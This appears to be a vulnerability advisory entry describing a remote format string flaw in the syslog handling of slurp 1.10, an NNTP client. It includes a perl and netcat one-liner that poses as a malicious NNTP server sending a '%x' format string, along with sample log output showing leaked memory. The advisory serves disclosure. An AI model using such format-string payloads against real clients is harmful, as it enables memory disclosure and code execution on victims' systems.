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Slurp 1.10 SysLog Remote Format String Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
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Slurp 1.10 SysLog Remote Format String Vulnerability allows remote code execution by supplying custom format string in syslog functio

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                                                source: http://www.securityfocus.com/bid/4935/info

slurp is a freely available, open source NNTP client. It is designed for use on most Unix and Linux operating systems.

It may be possible for a remote server to execute code on a vulnerable client. slurp offers functionality that allows the software to write messages to the system log. A format string vulnerability in the syslog function may allow a malicious server to supply a custom format string that writes to an arbitrary address in memory.

perl -e 'print "200 Hello brother \n666 %x%x%x\n'" | nc -l -p 119

Then check /var/log/messages for something like:

Jun 5 05:10:22 yada slurp[39926]: do_newnews: NNTP protocol error: got '666 bfbff4f8804bc1bbfbff51c'


                              

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